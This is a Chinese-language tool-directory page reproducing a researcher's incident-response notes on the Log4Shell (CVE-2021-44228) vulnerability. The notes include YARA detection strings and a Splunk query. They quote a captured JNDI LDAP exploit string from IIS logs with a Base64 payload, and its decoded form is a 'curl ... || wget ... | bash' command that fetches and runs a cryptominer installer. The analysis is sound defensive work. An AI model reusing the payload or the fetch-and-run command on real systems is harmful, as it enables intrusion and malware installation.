Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-44228-DFIR-Notes — CVE-2021-44228 DFIR 笔记 | Kitploit
工具/GitHubGitHub/azeemering/cve-2021-44228-dfir-notes
漏洞分析恶意软件分析数字取证威胁情报学习与教育事件响应日志分析
GitHubazeemering/cve-2021-44228-dfir-notes

CVE-2021-44228-DFIR-Notes

CVE-2021-44228 DFIR 笔记

查看仓库
7224年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-44228 DFIR-Notes

驱车回家途中,我收到了关于 #log4shell 漏洞的第一波消息。

2021年12月9日,Apache Log4j 2 工具多个版本受到一个严重漏洞(CVE-2021-44228)的影响,该漏洞通过项目的 GitHub 公开发布。此漏洞由阿里巴巴云安全团队的陈兆军发现,影响 Apache Log4j 2 版本 2.0 至 2.14.1。

到家后我立刻投入工作。一如既往地使用 Splunk4tw。

首个概念验证漏洞利用在 GitHub 上发布后,威胁行为者开始扫描互联网,寻找存在此远程可利用安全漏洞(无需认证)的系统。下面你将看到的是其中部分扫描和漏洞利用尝试。

我的第一反应是看看是否有人发布了初始 YARA 规则。 在这里找到了:https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b(感谢 Florian Roth)

它提到了以下检测字符串: strings: $x1 = "${jndi:ldap:/" $x2 = "${jndi:rmi:/" $x3 = "${jndi:ldaps:/" $x4 = "${jndi:dns:/"

我不怕……让我们压榨一下 CPU,直接用最糟糕的 Splunk 搜索来个致命一击。

index=* jndi:ldap* (updated query with index=* "{lower:l}${lower:d}a${lower:p}")

我在我的 IIS 日志和 Windows 事件日志(已编辑)中都发现了命中记录,防火墙日志中也有大量被拦截的尝试……

IIS: image

WINEVENTLOG: image

检查 IP 地址 45.155.205.233……圣彼得堡,俄罗斯……真是意料之中。 image

找到的字符串看起来像一个经典的教科书式混淆编码恶意字符串。 让我们看看它做了什么:

使用 CyberChef 解码 Base64 字符串: 2021-12-10 13:26:16 [redacted] GET / - 443 - xxx.xx.xxx.xx ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNDUuMzUuMTk1LjYzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE0NS4zNS4xOTUuNjM6ODApfGJhc2g=} http://[redacted]:80/ 200 0 0 171

image

(curl -s 45.155.xx.233:xxxx/145.xx.195.63:80||wget -q -O- 45.xx.205.233:xxxx/145.xx.xxx.63:80)|bash

Curl……运行 shell 脚本,bash……我的天。我开始意识到这个恶心的东西会做什么了……

让我们在沙盒中运行这个 curl 命令:

image

368 行代码。 (如果你想查看整个脚本,在这里运行:https://reqbin.com/c-ipejxywd)

一些片段:

image image image

完成后,它甚至还会清除日志文件……真是意料之中:

image

它基本上试图安装一种名为 Kingsin 的恶意软件,这是一种加密货币矿机。目标是 nix 系统。 请确保修补你的系统,因为该漏洞利用可能会被用于运行各种载荷。

感谢我的同事 Umbrio 的 Martijn 和 Rob [redacted],在这个周五晚上通过 WhatsApp 激烈讨论。 00:09 该睡觉了。

#更新与优质资源#

  • https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html
  • https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
  • https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228

image

下载工具